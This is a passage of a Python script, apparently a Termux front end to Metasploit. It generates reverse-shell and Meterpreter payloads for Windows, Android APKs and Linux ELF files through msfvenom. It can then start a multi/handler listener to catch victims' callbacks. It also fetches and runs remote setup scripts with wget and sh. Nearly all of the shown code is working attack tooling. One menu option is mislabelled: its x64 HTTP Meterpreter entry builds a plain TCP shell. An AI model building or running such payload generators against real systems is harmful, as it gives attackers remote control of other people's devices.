os.system("msfvenom --platform windows -p windows/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 615 | print("\n") 616 | slowprint2(colors.red + "############## Payload Generating Success ##############") 617 | print("\n") 618 | slowprint2(colors.green + "######################## Done ##########################") 619 | print("\n") 620 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 621 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 622 | pay = "windows/meterpreter_reverse_https" 623 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 624 | menu() 625 | else: 626 | slowprint2(colors.green + "################## Starting Listner ####################") 627 | print("\n") 628 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 629 | time.sleep(2) 630 | menu() 631 | 632 | if win == "7": 633 | pubip() 634 | host = str(input("\033[37m[+] LHOST : ")) 635 | port = str(input("\033[37m[+] LPORT : ")) 636 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 637 | print("\n") 638 | slowprint2(colors.red + "####################### Starting #######################") 639 | print("\n") 640 | slowprint2(colors.red + "################## Generating Payload ##################") 641 | print("\n") 642 | os.system("msfvenom --platform windows -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe -o {2}.exe".format(host,port,outp)) 643 | print("\n") 644 | slowprint2(colors.red + "############## Payload Generating Success ##############") 645 | print("\n") 646 | slowprint2(colors.green + "######################## Done ##########################") 647 | print("\n") 648 | winlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 649 | if winlis == "Yes" or winlis == "yes" or winlis == "y" or winlis == "Y": 650 | pay = "windows/meterpreter_reverse_tcp" 651 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 652 | menu() 653 | else: 654 | slowprint2(colors.green + "################## Starting Listner ####################") 655 | print("\n") 656 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 657 | time.sleep(2) 658 | menu() 659 | 660 | else: 661 | time.sleep(2) 662 | menu() 663 | 664 | 665 | def crandro(): 666 | start() 667 | pubip() 668 | slowprint(colors.green + """ 669 | [1] android/shell/reverse_http 670 | [2] android/shell/reverse_https 671 | [3] android/shell/reverse_tcp 672 | [4] android/meterpreter/reverse_http 673 | [5] android/meterpreter/reverse_https 674 | [6] android/meterpreter/reverse_tcp 675 | [7] android/meterpreter_reverse_http 676 | [8] android/meterpreter_reverse_https 677 | [9] android/meterpreter_reverse_tcp 678 | 679 | [00] Back 680 | 681 | """) 682 | crandroget = str(input("\033[37m[\033[31m+\033[37m] Android > ")) 683 | if crandroget == "1": 684 | host = str(input("\033[37m[+] LHOST : ")) 685 | port = str(input("\033[37m[+] LPORT : ")) 686 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 687 | print("\n") 688 | slowprint2(colors.red + "####################### Starting #######################") 689 | print("\n") 690 | slowprint2(colors.red + "################## Generating Payload ##################") 691 | print("\n") 692 | os.system("msfvenom --platform android -p android/shell/reverse_http LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 693 | print("\n") 694 | slowprint2(colors.red + "############## Payload Generating Success ##############") 695 | print("\n") 696 | slowprint2(colors.green + "######################## Done ##########################") 697 | print("\n") 698 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 699 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 700 | print("\n") 701 | slowprint2(colors.green + "################## Starting Listner ####################") 702 | pay = "android/shell/reverse_http" 703 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 704 | menu() 705 | else: 706 | print("\n") 707 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 708 | menu() 709 | 710 | if crandroget == "2": 711 | host = str(input("\033[37m[+] LHOST : ")) 712 | port = str(input("\033[37m[+] LPORT : ")) 713 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 714 | print("\n") 715 | slowprint2(colors.red + "####################### Starting #######################") 716 | print("\n") 717 | slowprint2(colors.red + "################## Generating Payload ##################") 718 | print("\n") 719 | os.system("msfvenom --platform android -p android/shell/reverse_https LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 720 | print("\n") 721 | slowprint2(colors.red + "############## Payload Generating Success ##############") 722 | print("\n") 723 | slowprint2(colors.green + "######################## Done ##########################") 724 | print("\n") 725 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 726 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 727 | print("\n") 728 | slowprint2(colors.green + "################## Starting Listner ####################") 729 | pay = "android/shell/reverse_https" 730 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 731 | menu() 732 | else: 733 | print("\n") 734 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 735 | menu() 736 | 737 | if crandroget == "3": 738 | host = str(input("\033[37m[+] LHOST : ")) 739 | port = str(input("\033[37m[+] LPORT : ")) 740 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 741 | print("\n") 742 | slowprint2(colors.red + "####################### Starting #######################") 743 | print("\n") 744 | slowprint2(colors.red + "################## Generating Payload ##################") 745 | print("\n") 746 | os.system("msfvenom --platform android -p android/shell/reverse_tcp LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 747 | print("\n") 748 | slowprint2(colors.red + "############## Payload Generating Success ##############") 749 | print("\n") 750 | slowprint2(colors.green + "######################## Done ##########################") 751 | print("\n") 752 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 753 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 754 | print("\n") 755 | slowprint2(colors.green + "################## Starting Listner ####################") 756 | pay = "android/shell/reverse_tcp" 757 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 758 | menu() 759 | else: 760 | print("\n") 761 | slowprint2(colors.red + "################ Starting Listner Failed ################") 762 | menu() 763 | 764 | 765 | if crandroget == "4": 766 | host = str(input("\033[37m[+] LHOST : ")) 767 | port = str(input("\033[37m[+] LPORT : ")) 768 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 769 | print("\n") 770 | slowprint2(colors.red + "####################### Starting #######################") 771 | print("\n") 772 | slowprint2(colors.red + "################## Generating Payload ##################") 773 | print("\n") 774 | os.system("msfvenom --platform android -p android/meterpreter/reverse_http LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 775 | print("\n") 776 | slowprint2(colors.red + "############## Payload Generating Success ##############") 777 | print("\n") 778 | slowprint2(colors.green + "######################### Done #########################") 779 | print("\n") 780 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 781 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 782 | print("\n") 783 | slowprint2(colors.green + "################## Starting Listner ####################") 784 | pay = "android/meterpreter/reverse_http" 785 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 786 | menu() 787 | else: 788 | print("\n") 789 | slowprint2(colors.red + "################ Starting Listner Failed ################") 790 | menu() 791 | 792 | 793 | 794 | if crandroget == "5": 795 | host = str(input("\033[37m[+] LHOST : ")) 796 | port = str(input("\033[37m[+] LPORT : ")) 797 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 798 | print("\n") 799 | slowprint2(colors.red + "####################### Starting #######################") 800 | print("\n") 801 | slowprint2(colors.red + "################## Generating Payload ##################") 802 | print("\n") 803 | os.system("msfvenom --platform android -p android/meterpreter/reverse_https LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 804 | print("\n") 805 | slowprint2(colors.red + "############## Payload Generating Success ##############") 806 | print("\n") 807 | slowprint2(colors.green + "######################### Done #########################") 808 | print("\n") 809 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 810 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 811 | print("\n") 812 | slowprint2(colors.green + "################## Starting Listner ####################") 813 | pay = "android/meterpreter/reverse_https" 814 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 815 | menu() 816 | else: 817 | print("\n") 818 | slowprint2(colors.red + "################ Starting Listner Failed ################") 819 | menu() 820 | 821 | 822 | 823 | if crandroget == "6": 824 | host = str(input("\033[37m[+] LHOST : ")) 825 | port = str(input("\033[37m[+] LPORT : ")) 826 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 827 | print("\n") 828 | slowprint2(colors.red + "####################### Starting #######################") 829 | print("\n") 830 | slowprint2(colors.red + "################## Generating Payload ##################") 831 | print("\n") 832 | os.system("msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 833 | print("\n") 834 | slowprint2(colors.red + "############## Payload Generating Success ##############") 835 | print("\n") 836 | slowprint2(colors.green + "######################### Done #########################") 837 | print("\n") 838 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 839 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 840 | print("\n") 841 | slowprint2(colors.green + "################## Starting Listner ####################") 842 | pay = "android/meterpreter/reverse_tcp" 843 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 844 | menu() 845 | else: 846 | print("\n") 847 | slowprint2(colors.red + "################ Starting Listner Failed ################") 848 | menu() 849 | 850 | 851 | 852 | if crandroget == "7": 853 | host = str(input("\033[37m[+] LHOST : ")) 854 | port = str(input("\033[37m[+] LPORT : ")) 855 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 856 | print("\n") 857 | slowprint2(colors.red + "####################### Starting #######################") 858 | print("\n") 859 | slowprint2(colors.red + "################## Generating Payload ##################") 860 | print("\n") 861 | os.system("msfvenom --platform android -p android/meterpreter_reverse_http LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 862 | print("\n") 863 | slowprint2(colors.red + "############## Payload Generating Success ##############") 864 | print("\n") 865 | slowprint2(colors.green + "######################## Done ##########################") 866 | print("\n") 867 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 868 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 869 | print("\n") 870 | slowprint2(colors.green + "################# Starting Listner #####################") 871 | pay = "android/meterpreter_reverse_http" 872 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 873 | menu() 874 | else: 875 | print("\n") 876 | slowprint2(colors.red + "################ Starting Listner Failed ################") 877 | menu() 878 | 879 | if crandroget == "8": 880 | host = str(input("\033[37m[+] LHOST : ")) 881 | port = str(input("\033[37m[+] LPORT : ")) 882 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 883 | print("\n") 884 | slowprint2(colors.red + "####################### Starting #######################") 885 | print("\n") 886 | slowprint2(colors.red + "################## Generating Payload ##################") 887 | print("\n") 888 | os.system("msfvenom --platform android -p android/meterpreter_reverse_https LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 889 | print("\n") 890 | slowprint2(colors.red + "############## Payload Generating Success ##############") 891 | print("\n") 892 | slowprint2(colors.green + "######################### Done #########################") 893 | print("\n") 894 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 895 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 896 | print("\n") 897 | slowprint2(colors.green + "################## Starting Listner ####################") 898 | pay = "android/meterpreter_reverse_https" 899 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 900 | menu() 901 | else: 902 | print("\n") 903 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 904 | menu() 905 | 906 | if crandroget == "9": 907 | host = str(input("\033[37m[+] LHOST : ")) 908 | port = str(input("\033[37m[+] LPORT : ")) 909 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 910 | print("\n") 911 | slowprint2(colors.red + "####################### Starting #######################") 912 | print("\n") 913 | slowprint2(colors.red + "################## Generating Payload ##################") 914 | print("\n") 915 | os.system("msfvenom --platform android -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} -o {2}.apk".format(host,port,outp)) 916 | print("\n") 917 | slowprint2(colors.red + "############## Payload Generating Success ##############") 918 | print("\n") 919 | slowprint2(colors.green + "######################### Done #########################") 920 | print("\n") 921 | androlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 922 | if androlis == "Yes" or androlis == "yes" or androlis == "y" or androlis == "Y": 923 | print("\n") 924 | slowprint2(colors.green + "################## Starting Listner ####################") 925 | pay = "android/meterpreter_reverse_tcp" 926 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 927 | menu() 928 | else: 929 | print("\n") 930 | slowprint2(colors.red + "################ Starting Listner Failed ################") 931 | menu() 932 | 933 | else: 934 | menu() 935 | 936 | 937 | 938 | def crlinux(): 939 | start() 940 | pubip() 941 | slowprint(colors.green + """ 942 | [1] linux/x86/shell/reverse_tcp 943 | [2] linux/x86/meterpreter_reverse_http 944 | [3] linux/x86/meterpreter_reverse_https 945 | [4] linux/x86/meterpreter_reverse_tcp 946 | [5] linux/x64/shell/reverse_tcp 947 | [6] linux/x64/meterpreter_reverse_http 948 | [7] linux/x64/meterpreter_reverse_https 949 | [8] linux/x64/meterpreter_reverse_tcp 950 | 951 | [00] Back 952 | 953 | """) 954 | crlinuxget = str(input("\033[37m[\033[31m+\033[37m] Linux > ")) 955 | if crlinuxget == "1": 956 | host = str(input("\033[37m[+] LHOST : ")) 957 | port = str(input("\033[37m[+] LPORT : ")) 958 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 959 | print("\n") 960 | slowprint2(colors.red + "####################### Starting #######################") 961 | print("\n") 962 | slowprint2(colors.red + "################## Generating Payload ##################") 963 | print("\n") 964 | os.system("msfvenom --platform linux -f elf -p linux/x86/shell/reverse_tcp LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 965 | print("\n") 966 | slowprint2(colors.red + "############## Payload Generating Success ##############") 967 | print("\n") 968 | slowprint2(colors.green + "######################### Done #########################") 969 | print("\n") 970 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 971 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 972 | print("\n") 973 | slowprint2(colors.green + "################## Starting Listner ####################") 974 | pay = "linux/x86/shell/reverse_tcp" 975 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 976 | menu() 977 | else: 978 | print("\n") 979 | slowprint2(colors.red + "################ Starting Listner Failed ################") 980 | menu() 981 | 982 | if crlinuxget == "2": 983 | host = str(input("\033[37m[+] LHOST : ")) 984 | port = str(input("\033[37m[+] LPORT : ")) 985 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 986 | print("\n") 987 | slowprint2(colors.red + "####################### Starting #######################") 988 | print("\n") 989 | slowprint2(colors.red + "################# Generating Payload ###################") 990 | print("\n") 991 | os.system("msfvenom --platform linux -f elf -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 992 | print("\n") 993 | slowprint2(colors.red + "############## Payload Generating Success ##############") 994 | print("\n") 995 | slowprint2(colors.green + "######################## Done ##########################") 996 | print("\n") 997 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 998 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 999 | print("\n") 1000 | slowprint2(colors.green + "################## Starting Listner ####################") 1001 | pay = "linux/x86/meterpreter_reverse_http" 1002 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1003 | menu() 1004 | else: 1005 | print("\n") 1006 | slowprint2(colors.red + "################ Starting Listner Failed ################") 1007 | menu() 1008 | 1009 | if crlinuxget == "3": 1010 | host = str(input("\033[37m[+] LHOST : ")) 1011 | port = str(input("\033[37m[+] LPORT : ")) 1012 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1013 | print("\n") 1014 | slowprint2(colors.red + "####################### Starting #######################") 1015 | print("\n") 1016 | slowprint2(colors.red + "################## Generating Payload ##################") 1017 | print("\n") 1018 | os.system("msfvenom --platform linux -f elf -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1019 | print("\n") 1020 | slowprint2(colors.red + "############# Payload Generating Success ###############") 1021 | print("\n") 1022 | slowprint2(colors.green + "######################## Done ##########################") 1023 | print("\n") 1024 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1025 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1026 | print("\n") 1027 | slowprint2(colors.green + "################## Starting Listner ####################") 1028 | pay = "linux/x86/meterpreter_reverse_https" 1029 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1030 | menu() 1031 | else: 1032 | print("\n") 1033 | slowprint2(colors.red + "################ Starting Listner Failed ################") 1034 | menu() 1035 | 1036 | if crlinuxget == "4": 1037 | host = str(input("\033[37m[+] LHOST : ")) 1038 | port = str(input("\033[37m[+] LPORT : ")) 1039 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1040 | print("\n") 1041 | slowprint2(colors.red + "####################### Starting #######################") 1042 | print("\n") 1043 | slowprint2(colors.red + "################# Generating Payload ###################") 1044 | print("\n") 1045 | os.system("msfvenom --platform linux -f elf -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1046 | print("\n") 1047 | slowprint2(colors.red + "############## Payload Generating Success ##############") 1048 | print("\n") 1049 | slowprint2(colors.green + "######################### Done #########################") 1050 | print("\n") 1051 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1052 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1053 | print("\n") 1054 | slowprint2(colors.green + "################## Starting Listner ####################") 1055 | pay = "linux/x86/meterpreter_reverse_tcp" 1056 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1057 | menu() 1058 | else: 1059 | print("\n") 1060 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 1061 | menu() 1062 | 1063 | if crlinuxget == "5": 1064 | host = str(input("\033[37m[+] LHOST : ")) 1065 | port = str(input("\033[37m[+] LPORT : ")) 1066 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1067 | print("\n") 1068 | slowprint2(colors.red + "######################## Starting ######################") 1069 | print("\n") 1070 | slowprint2(colors.red + "################## Generating Payload ##################") 1071 | print("\n") 1072 | os.system("msfvenom --platform linux -f elf -p linux/x64/shell/reverse_tcp LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1073 | print("\n") 1074 | slowprint2(colors.red + "############# Payload Generating Success ###############") 1075 | print("\n") 1076 | slowprint2(colors.green + "######################## Done ##########################") 1077 | print("\n") 1078 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1079 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1080 | print("\n") 1081 | slowprint2(colors.green + "################## Starting Listner ####################") 1082 | pay = "linux/x64/shell/reverse_tcp" 1083 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1084 | menu() 1085 | else: 1086 | print("\n") 1087 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 1088 | menu() 1089 | 1090 | if crlinuxget == "6": 1091 | host = str(input("\033[37m[+] LHOST : ")) 1092 | port = str(input("\033[37m[+] LPORT : ")) 1093 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1094 | print("\n") 1095 | slowprint2(colors.red + "####################### Starting #######################") 1096 | print("\n") 1097 | slowprint2(colors.red + "################# Generating Payload ###################") 1098 | print("\n") 1099 | os.system("msfvenom --platform linux -f elf -p linux/x64/shell/reverse_tcp LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1100 | print("\n") 1101 | slowprint2(colors.red + "############## Payload Generating Success ##############") 1102 | print("\n") 1103 | slowprint2(colors.green + "######################### Done #########################") 1104 | print("\n") 1105 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1106 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1107 | print("\n") 1108 | slowprint2(colors.green + "################### Starting Listner ####################") 1109 | pay = "linux/x64/shell/reverse_tcp" 1110 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1111 | menu() 1112 | else: 1113 | print("\n") 1114 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 1115 | menu() 1116 | 1117 | if crlinuxget == "7": 1118 | host = str(input("\033[37m[+] LHOST : ")) 1119 | port = str(input("\033[37m[+] LPORT : ")) 1120 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1121 | print("\n") 1122 | slowprint2(colors.red + "######################## Starting ######################") 1123 | print("\n") 1124 | slowprint2(colors.red + "################# Generating Payload ###################") 1125 | print("\n") 1126 | os.system("msfvenom --platform linux -f elf -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1127 | print("\n") 1128 | slowprint2(colors.red + "############# Payload Generating Success ###############") 1129 | print("\n") 1130 | slowprint2(colors.green + "######################## Done ##########################") 1131 | print("\n") 1132 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1133 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1134 | print("\n") 1135 | slowprint2(colors.green + "################# Starting Listner #####################") 1136 | pay = "linux/x64/meterpreter_reverse_https" 1137 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1138 | menu() 1139 | else: 1140 | print("\n") 1141 | slowprint2(colors.red + "################ Starting Listner Failed ################") 1142 | menu() 1143 | 1144 | if crlinuxget == "8": 1145 | host = str(input("\033[37m[+] LHOST : ")) 1146 | port = str(input("\033[37m[+] LPORT : ")) 1147 | outp = str(input("\033[37m[+] OUTPUT NAME : ")) 1148 | print("\n") 1149 | slowprint2(colors.red + "######################## Starting ######################") 1150 | print("\n") 1151 | slowprint2(colors.red + "################## Generating Payload ##################") 1152 | print("\n") 1153 | os.system("msfvenom --platform linux -f elf -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -o {2}.elf".format(host,port,outp)) 1154 | print("\n") 1155 | slowprint2(colors.red + "############## Payload Generating Success ##############") 1156 | print("\n") 1157 | slowprint2(colors.green + "######################### Done #########################") 1158 | print("\n") 1159 | linuxlis = str(input("\033[33m [+] Start a Listner (Y/N) : ")) 1160 | if linuxlis == "Yes" or linuxlis == "yes" or linuxlis == "y" or linuxlis == "Y": 1161 | print("\n") 1162 | slowprint2(colors.green + "################## Starting Listner ####################") 1163 | pay = "linux/x64/meterpreter_reverse_tcp" 1164 | os.system("msfconsole -x 'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD {2}; exploit'".format(host,port,pay)) 1165 | menu() 1166 | else: 1167 | print("\n") 1168 | slowprint2(colors.red + "################# Starting Listner Failed ###############") 1169 | menu() 1170 | 1171 | else: 1172 | menu() 1173 | 1174 | def exit(): 1175 | slowprint2(colors.red + " [!] Stoping Script [!]") 1176 | time.sleep(2) 1177 | os.system("pg_ctl -D $PREFIX/var/lib/postgresql stop") 1178 | os.system("apt clean") 1179 | quit() 1180 | 1181 | def dbstart(): 1182 | slowprint2(colors.green + " [ ✔ ] SERVICE MSFDB STARTING") 1183 | time.sleep(1) 1184 | slowprint2(colors.green + " [ ✔ ] SERVICE POSTGRSQL STARTING") 1185 | os.system('initdb $PREFIX/var/lib/postgresql > /dev/null 2>&1 ') 1186 | os.system('pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1') 1187 | slowprint2(colors.green + " [ ✔ ] SERVICE POSTGRSQL STARTED") 1188 | time.sleep(2) 1189 | 1190 | def msfinstall(): 1191 | start() 1192 | msfi = input(colors.green + " [ + ] Are you sure to Install Metasploit ? ") 1193 | if msfi == "y" or msfi == "Y" or msfi == "yes" or msfi == "YES" or msfi == "Yes": 1194 | os.system('cd $HOME') 1195 | os.system('apt install wget') 1196 | os.system('wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh') 1197 | os.system('chmod +x metasploit.sh') 1198 | os.system('./metasploit.sh') 1199 | else: 1200 | menu() 1201 | 1202 | if os.system("which msfconsole >/dev/null 2>&1") == 0: 1203 | slowprint2(colors.green + " [ ✔ ] Metasploit-Framework Found") 1204 | time.sleep(1) 1205 | pass 1206 | else: 1207 | slowprint2(colors.green + " [ x ] Metasploit-Framework Not Found") 1208 | time.sleep(2) 1209 | msfinstall() 1210 | 1211 | def apkmodins(): 1212 | start() 1213 | amins = input(colors.green + " [ + ] Are you sure to Install APKMOD ? ") 1214 | if amins == "y" or amins == "Y" or amins == "yes" or amins == "YES" or amins == "Yes": 1215 | os.system('cd $HOME') 1216 | os.system('wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh') 1217 | os.system('sh setup.sh') 1218 | time.sleep(5) 1219 | else: 1220 | menu() 1221 | 1222 | if os.system("which apkmod >/dev/null 2>&1") == 0: 1223 | slowprint2(colors.green + " [ ✔ ] Apkmod Found") 1224 | time.sleep(1) 1225 | pass 1226 | else: 1227 | slowprint2(colors.green + " [ x ] Apkmod Not Found") 1228 | time.sleep(2) 1229 | apkmodins() 1230 | 1231 | def program(): 1232 | try: 1233 | dbstart() 1234 | menu() 1235 | except KeyboardInterrupt: 1236 | con = input(colors.red + "\n\n [c] Continue [q] Quit : ") 1237 | if con == "c" or con == "C" or con == "continue" or con == "Continue": 1238 | menu() 1239 | else: 1240 | exit() 1241 | 1242 | if '__main__' == __name__: 1243 | program() 1244 | --------------------------------------------------------------------------------